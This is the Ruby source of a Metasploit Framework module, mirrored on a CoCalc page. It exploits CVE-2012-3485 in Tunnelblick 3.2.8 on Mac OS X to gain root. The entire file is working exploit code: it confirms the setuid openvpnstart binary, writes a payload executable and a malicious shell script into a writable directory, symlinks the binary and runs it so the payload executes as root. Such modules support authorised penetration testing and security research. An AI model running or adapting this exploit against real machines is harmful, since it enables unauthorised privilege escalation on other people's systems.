Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/osx/local/setuid_tunnelblick.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Local
7
Rank = ExcellentRanking
8
9
include Msf::Post::OSX::Priv
10
include Msf::Post::File
11
include Msf::Exploit::EXE
12
13
def initialize(info = {})
14
super(
15
update_info(
16
info,
17
{
18
'Name' => 'Setuid Tunnelblick Privilege Escalation',
19
'Description' => %q{
20
This module exploits a vulnerability in Tunnelblick 3.2.8 on Mac OS X. The
21
vulnerability exists in the setuid openvpnstart, where an insufficient
22
validation of path names allows execution of arbitrary shell scripts as root.
23
This module has been tested successfully on Tunnelblick 3.2.8 build 2891.3099
24
over Mac OS X 10.7.5.
25
},
26
'References' => [
27
[ 'CVE', '2012-3485' ],
28
[ 'OSVDB', '84706' ],
29
[ 'EDB', '20443' ],
30
[ 'URL', 'http://blog.zx2c4.com/791' ]
31
],
32
'License' => MSF_LICENSE,
33
'Author' => [
34
'Jason A. Donenfeld', # Vulnerability discovery and original Exploit
35
'juan vazquez' # Metasploit module
36
],
37
'DisclosureDate' => '2012-08-11',
38
'Platform' => 'osx',
39
'Arch' => [ ARCH_X86, ARCH_X64 ],
40
'SessionTypes' => [ 'shell' ],
41
'Targets' => [
42
[ 'Tunnelblick 3.2.8 / Mac OS X x86', { 'Arch' => ARCH_X86 } ],
43
[ 'Tunnelblick 3.2.8 / Mac OS X x64', { 'Arch' => ARCH_X64 } ]
44
],
45
'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
}
53
)
54
)
55
register_options [
56
# These are not OptPath because it's a *remote* path
57
OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
58
OptString.new("Tunnelblick", [ true, "Path to setuid openvpnstart executable", "/Applications/Tunnelblick.app/Contents/Resources/openvpnstart" ])
59
]
60
end
61
62
def base_dir
63
datastore['WritableDir'].to_s
64
end
65
66
def check
67
unless file? datastore['Tunnelblick']
68
vprint_error 'openvpnstart not found'
69
return CheckCode::Safe
70
end
71
72
check = cmd_exec("find #{datastore["Tunnelblick"]} -type f -user root -perm -4000")
73
74
unless check.include? 'openvpnstart'
75
return CheckCode::Safe
76
end
77
78
CheckCode::Vulnerable
79
end
80
81
def clean
82
file_rm(@link)
83
cmd_exec("rm -rf #{base_dir}/openvpn")
84
end
85
86
def exploit
87
if is_root?
88
fail_with Failure::BadConfig, 'Session already has root privileges'
89
end
90
91
if check != CheckCode::Vulnerable
92
fail_with Failure::NotVulnerable, 'Target is not vulnerable'
93
end
94
95
unless writable? base_dir
96
fail_with Failure::BadConfig, "#{base_dir} is not writable"
97
end
98
99
print_status("Creating directory...")
100
cmd_exec "mkdir -p #{base_dir}/openvpn/openvpn-0"
101
102
exe_name = rand_text_alpha(8)
103
@exe_file = "#{base_dir}/openvpn/openvpn-0/#{exe_name}"
104
print_status("Dropping executable #{@exe_file}")
105
write_file(@exe_file, generate_payload_exe)
106
cmd_exec "chmod +x #{@exe_file}"
107
108
evil_sh = <<~EOF
109
#!/bin/sh
110
#{@exe_file}
111
EOF
112
113
@sh_file = "#{base_dir}/openvpn/openvpn-0/openvpn"
114
print_status("Dropping shell script #{@sh_file}...")
115
write_file(@sh_file, evil_sh)
116
cmd_exec "chmod +x #{@sh_file}"
117
118
link_name = rand_text_alpha(8)
119
@link = "#{base_dir}/#{link_name}"
120
print_status("Creating symlink #{@link}...")
121
cmd_exec "ln -s -f -v #{datastore["Tunnelblick"]} #{@link}"
122
123
print_status("Running...")
124
begin
125
cmd_exec "#{@link} OpenVPNInfo 0"
126
rescue
127
print_error("Failed. Cleaning files #{@link} and the #{base_dir}/openvpn directory")
128
clean
129
return
130
end
131
print_warning("Remember to clean files: #{@link} and the #{base_dir}/openvpn directory")
132
end
133
end
134
135